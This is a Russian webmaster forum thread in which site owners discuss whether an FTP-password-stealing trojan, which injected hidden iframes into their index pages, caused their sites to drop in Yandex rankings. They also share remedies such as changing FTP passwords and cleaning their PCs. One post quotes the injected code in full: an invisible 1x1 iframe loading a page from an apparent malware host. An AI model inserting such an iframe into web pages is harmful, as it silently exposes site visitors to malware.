Влияние вируса на понижение в позициях.

12 3
dittmer
На сайте с 08.01.2007
Offline
74
6098

Заранее прошу прощение если не там запостился, или тема уже обсуждалась, но ответов не нашел.

Скажите кто знает, какое влиянее оказывает троянец всаженный в код главной страницы при взломе, на понижение в позициях и оказывает вообще? У меня это случилось на кануне последнего апа яндекса. Вирус был обнаружен и удален уже на второй день.

Zloi-Alex
На сайте с 01.10.2006
Offline
79
#1

Тоже подхватил вирусок, в итоге на 2 дня хостером был отключен аккаунт и морды вывалились из поиска как результат выскочил из всех запросов. После вчерашнего апа морды вернулись и восстановились некоторые позиции.

Был троян с редиректом.

ИМХО: еслиб не хостер может бы всё и обошлось т.к. код вируса прописывался в конце кода страницы

G
На сайте с 09.02.2006
Offline
46
#2

такая же фигня была на днях, скиньте пожалуйста в личку, какой у вас хостер...

Оборотень в погонах
На сайте с 19.03.2007
Offline
3
#3

главное вовремя заметить!

единственное лекарство - "смена пароля фтп" для всех сайтов, т.к. данный троян собирая информацию с вашего фтп передает пароли другим компьютерам зараженными этим трояном, с которых, в свою очередь, может быть изменен любой ваш сайт, без вашего участия...

на какоето-время это спасет! потом, скорее всего придется менть пароль еще раз...

у меня в данный момент, в течении всего дня, каждый час, данным трояном перезаписывается файл index.php на всех моих сайтах, который вставляетвот такую строчечку в код: - <iframe src='http://strumpf1.com/yabb/Sources' width='1' height='1' style='visibility: hidden;'></iframe>

вот сижу отслеживаю и перезаписываю оригинал...

- - - - - - - - - - - - - - -
KL
На сайте с 30.11.2006
Offline
3
#4

Были аналогичные проблемы, яндексу это не понравилось.

Сайт упал из ТОПа на 79 позицию по ВЧ запросу, по которому держался в ТОПе несколько месяцев. Десятки НЧ и СЧ аналогичным образом (их меньше отслеживал).

После исправления огрехи и переиндексации, все вернулось.

Может ему конечно и собственно iframe не понравился. А может яндекс знает вирус и не хочет на вирусеный сайт трафик гнать

Maxi21
На сайте с 07.12.2006
Offline
225
#5
KostaLink:
А может яндекс знает вирус и не хочет на вирусеный сайт трафик гнать

Лучше б он научился при каждом апе не терять часть бд, а не вирусы разыскивать...на это есть антивирусы и файрволы.

Google ;) (http://google.com)
I
На сайте с 28.03.2007
Offline
9
ipw
#6
dittmer:
какое влиянее оказывает троянец всаженный в код главной страницы при взломе

Как Вы определили, что в коде главной страницы вирус, каким образом он себя прописал?

I
На сайте с 06.03.2006
Offline
21
#7

ipw - вирус попадает на компьютер пользователя, высылает пароль для ftp на почту злоумышленника , даее в автоматическом режиме к index файлам добавляется <iframe> в котором прописана ссылка на сайт с вирусом.

Была такая проблема. нужна очистить систему и поменять пароль на ftp.

Программист
SyncMaster
На сайте с 05.02.2007
Offline
12
#8

по мимо смены пароля лучше вобще не сохранять пароли в программах для FTP! Суть в том что этот троянец ворует файлы из программ для FTP (у меня стоит CuteFTP). в автомате каждое утро появлялся фрейм! После полной чистки ПК и смены паролей виря не заметил, НО как он попал на ПК при полной его защите фиг знает... его нашли когда он уже попал и украл пароли, т.ч .. я сохранил пароли в отдельный фалик .тхт и от туда копирую... про не удобно говорить не надо т.к. у меня там больше 15 сайтов, и сам знаю что не удобно но безопасно!

Бьешь в репу? Подпишись трус >_> Продаю душу за жирные морды :)
I
На сайте с 28.03.2007
Offline
9
ipw
#9
inetjob:
к index файлам добавляется <iframe> в котором прописана ссылка на сайт с вирусом.
Была такая проблема. нужна очистить систему и поменять пароль на ftp.

А как он прописывается в index.php, если в нем сплошь только php-код, а html в него подгружается из шаблона?

Какое точное название этого вируса? Как чистить компьютер, т.е. какие файлы сносить или лечить? Поподробнее пожалуйста можно.

montanara
На сайте с 08.02.2006
Offline
118
#10

dittmer, та же ситуация. В сайт был вписан iframe с редиректом на вирусную страницу. Сайт сейчас выпал по всем запросам. Пока не нашел других объяснений. Надеюсь, вернется через ап другой.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий